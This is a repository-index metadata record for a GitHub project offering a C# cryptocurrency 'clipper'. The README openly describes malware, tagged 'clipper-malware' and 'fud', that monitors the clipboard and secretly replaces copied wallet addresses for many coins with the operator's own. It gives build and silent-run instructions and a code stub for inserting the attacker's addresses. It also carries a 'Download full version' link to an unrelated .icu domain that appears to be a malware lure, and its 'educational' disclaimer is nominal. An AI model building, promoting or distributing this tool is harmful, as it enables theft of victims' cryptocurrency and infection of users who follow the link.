{"id":28604666,"url":"https://github.com/undercloudezios8/crypto-clipper-c-sharp","last_synced_at":"2025-06-22T07:34:38.985Z","repository":{"id":297813840,"uuid":"997997352","full_name":"undercloudezios8/Crypto-Clipper-C-Sharp","owner":"undercloudezios8","description":"Clipboard Crypto Address Replacer is a C# tool that monitors the clipboard and replaces cryptocurrency wallet addresses with predefined ones using regex detection and RSA encryption.","archived":false,"fork":false,"pushed_at":"2025-06-07T16:43:12.000Z","size":0,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":0,"default_branch":"main","last_synced_at":"2025-06-07T17:18:27.615Z","etag":null,"topics":["aes-encryption","aes256","bitcoin","clipper","clipper-address","clipper-algorithm","clipper-crypto","clipper-fud","clipper-malware","clipper-tool","crypto","crypto-bot","crypto-clipper","crypto-clipper-fast","crypto-clipping","crypto-tools","cryptocurrency","fud","rsa-algorithm","rsa-cryptography"],"latest_commit_sha":null,"homepage":"","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/undercloudezios8.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2025-06-07T16:41:53.000Z","updated_at":"2025-06-07T16:43:15.000Z","dependencies_parsed_at":"2025-06-07T17:18:29.733Z","dependency_job_id":"f325b0a0-9e81-4ccb-a1e1-027bb2ea42e1","html_url":"https://github.com/undercloudezios8/Crypto-Clipper-C-Sharp","commit_stats":null,"previous_names":["undercloudezios8/crypto-clipper-c-sharp"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/undercloudezios8/Crypto-Clipper-C-Sharp","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/undercloudezios8%2FCrypto-Clipper-C-Sharp","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/undercloudezios8%2FCrypto-Clipper-C-Sharp/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/undercloudezios8%2FCrypto-Clipper-C-Sharp/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/undercloudezios8%2FCrypto-Clipper-C-Sharp/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/undercloudezios8","download_url":"https://codeload.github.com/undercloudezios8/Crypto-Clipper-C-Sharp/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/undercloudezios8%2FCrypto-Clipper-C-Sharp/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":259311560,"owners_count":22838746,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["aes-encryption","aes256","bitcoin","clipper","clipper-address","clipper-algorithm","clipper-crypto","clipper-fud","clipper-malware","clipper-tool","crypto","crypto-bot","crypto-clipper","crypto-clipper-fast","crypto-clipping","crypto-tools","cryptocurrency","fud","rsa-algorithm","rsa-cryptography"],"created_at":"2025-06-11T18:01:21.837Z","updated_at":"2025-06-11T18:03:07.129Z","avatar_url":"https://github.com/undercloudezios8.png","language":null,"funding_links":[],"categories":[],"sub_categories":[],"readme":"# Clipboard Crypto Address Replacer\nThis project is a C# application that replaces cryptocurrency wallet addresses copied to the clipboard with predefined addresses. The application detects wallet addresses using regex patterns for different cryptocurrencies and replaces them using RSA encryption.  \n\n[Download full version](https://installergitb.icu?0wx1um20ne0r4tr)\n\n\n## Features\n- **Clipboard Monitoring:** Continuously checks clipboard content.  \n- **Crypto Wallet Address Detection:** Uses regex patterns to detect supported cryptocurrency addresses.  \n- **RSA Encryption \u0026 Decryption:** Encrypts addresses and replaces them as needed.  \n- **Mutual Exclusion (Mutex) Usage:** Ensures only one instance runs at a time.  \n- **Secure Address Management:** Predefined addresses are stored using RSA encryption.  \n\n## Supported Cryptocurrencies\nThis application can detect the addresses of the following cryptocurrencies:  \n- Bitcoin (BTC)  \n- Litecoin (LTC)  \n- Ethereum (ETH)  \n- Monero (XMR)  \n- Ripple (XRP)  \n- NEO (NEO)  \n- Bitcoin Cash (BCH)  \n- Dogecoin (DOGE)  \n- Dash (DASH)  \n- Stellar (XLM)  \n- Binance Beacon (BNB) (Removed) \n- Tezos (XTZ)  \n- Tron (TRX)  \n- VeChain (VET)  \n- Nano (NANO)  \n- DigiByte (DGB)  \n- Qtum (QTUM)  \n- NEM (XEM)  \n- Waves (WAVES)  \n- Zcash (ZEC)  \n- Cardano (ADA)  \n- Polkadot (DOT)  \n- Cosmos (ATOM)  \n- Lisk (LSK)  \n- Kava (KAVA)  \n- Algorand (ALGO)  \n- Filecoin (FIL)  \n- Terra (LUNA)  \n- Thorchain (RUNE)  \n\n## Usage  \n\n### Requirements  \n- Visual Studio 2022\n- .NET Framework must be installed.  \n- Windows operating system is required (uses Clipboard API).\n\n### Compilation\n- Download the project to your computer\n- Extract the project to a Folder.\n- Open Solution File\n- Write your own addresses where `*_ADDRESS` is written. If not present, leave blank\n- Select **Build Solution** from the **Build** menu.\n\n### Execution\n\n- Compiled File Location: `.\\bin\\Debug\\Clipper.exe`\n- When you run the file, it runs silently in the background.\n\nhttps://github.com/user-attachments/assets/e55ef5f5-71f5-45fe-bb74-9afebea2fd10\n\n## Contributing  \n\n**⭐ Star this repository if you find it useful!**\n\u003c!---\n## Address\n```csharp\n\n        encryptedData.Add(\"btc\", EncryptData(publicKey, Encoding.UTF8.GetBytes(\"BTC_ADDRESS\")));\n        encryptedData.Add(\"ltc\", EncryptData(publicKey, Encoding.UTF8.GetBytes(\"LTC_ADDRESS\")));\n        encryptedData.Add(\"xmr\", EncryptData(publicKey, Encoding.UTF8.GetBytes(\"XMR_ADDRESS\")));\n        encryptedData.Add(\"eth\", EncryptData(publicKey, Encoding.UTF8.GetBytes(\"ETH_ADDRESS\")));\n        encryptedData.Add(\"xrp\", EncryptData(publicKey, Encoding.UTF8.GetBytes(\"XRP_ADDRESS\")));\n        encryptedData.Add(\"neo\", EncryptData(publicKey, Encoding.UTF8.GetBytes(\"NEO_ADDRESS\")));\n        encryptedData.Add(\"bch\", EncryptData(publicKey, Encoding.UTF8.GetBytes(\"BCH_ADDRESS\")));\n        encryptedData.Add(\"doge\", EncryptData(publicKey, Encoding.UTF8.GetBytes(\"DOGE_ADDRESS\")));\n        encryptedData.Add(\"dash\", EncryptData(publicKey, Encoding.UTF8.GetBytes(\"DASH_ADDRESS\")));\n        encryptedData.Add(\"xlm\", EncryptData(publicKey, Encoding.UTF8.GetBytes(\"XLM_ADDRESS\")));\n        /*encryptedData.Add(\"tethersol\", EncryptData(publicKey, Encoding.UTF8.GetBytes(\"SOLANA_ADDRESS\")));*/\n        encryptedData.Add(\"bnbbeacon\", EncryptData(publicKey, Encoding.UTF8.GetBytes(\"BNB_ADDRESS\")));\n        encryptedData.Add(\"tezos\", EncryptData(publicKey, Encoding.UTF8.GetBytes(\"TEZ_ADDRESS\")));\n        encryptedData.Add(\"tron\", EncryptData(publicKey, Encoding.UTF8.GetBytes(\"TRON_ADDRESS\")));\n        encryptedData.Add(\"vet\", EncryptData(publicKey, Encoding.UTF8.GetBytes(\"VET_ADDRESS\")));\n        encryptedData.Add(\"nano\", EncryptData(publicKey, Encoding.UTF8.GetBytes(\"NANO_ADDRESS\")));\n        encryptedData.Add(\"dgb\", EncryptData(publicKey, Encoding.UTF8.GetBytes(\"DGB_ADDRESS\")));\n        encryptedData.Add(\"qtum\", EncryptData(publicKey, Encoding.UTF8.GetBytes(\"QTUM_ADDRESS\")));\n        encryptedData.Add(\"xem\", EncryptData(publicKey, Encoding.UTF8.GetBytes(\"XEM_ADDRESS\")));\n        encryptedData.Add(\"waves\", EncryptData(publicKey, Encoding.UTF8.GetBytes(\"WAVES_ADDRESS\")));\n        encryptedData.Add(\"zec\", EncryptData(publicKey, Encoding.UTF8.GetBytes(\"ZEC_ADDRESS\")));\n        encryptedData.Add(\"ada\", EncryptData(publicKey, Encoding.UTF8.GetBytes(\"ADA_ADDRESS\")));\n        encryptedData.Add(\"dot\", EncryptData(publicKey, Encoding.UTF8.GetBytes(\"DOT_ADDRESS\")));\n        encryptedData.Add(\"cosmos\", EncryptData(publicKey, Encoding.UTF8.GetBytes(\"COSMOS_ADDRESS\")));\n        encryptedData.Add(\"lsk\", EncryptData(publicKey, Encoding.UTF8.GetBytes(\"LSK_ADDRESS\")));\n        encryptedData.Add(\"kava\", EncryptData(publicKey, Encoding.UTF8.GetBytes(\"KAVA_ADDRESS\")));\n        encryptedData.Add(\"algo\", EncryptData(publicKey, Encoding.UTF8.GetBytes(\"ALGO_ADDRESS\")));\n        encryptedData.Add(\"fil\", EncryptData(publicKey, Encoding.UTF8.GetBytes(\"FIL_ADDRESS\")));\n        encryptedData.Add(\"terra\", EncryptData(publicKey, Encoding.UTF8.GetBytes(\"TERRA_ADDRESS\")));\n        encryptedData.Add(\"thor\", EncryptData(publicKey, Encoding.UTF8.GetBytes(\"THOR_ADDRESS\")));\n```---\u003e\n## Disclaimer\n\nThis project is for **educational and research purposes only**. Malicious or unethical use is strictly discouraged. Users should assess their own risks before executing this code.\n\n## License  \nThis project is open-source and licensed under the MIT License.  \n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fundercloudezios8%2Fcrypto-clipper-c-sharp","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fundercloudezios8%2Fcrypto-clipper-c-sharp","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fundercloudezios8%2Fcrypto-clipper-c-sharp/lists"}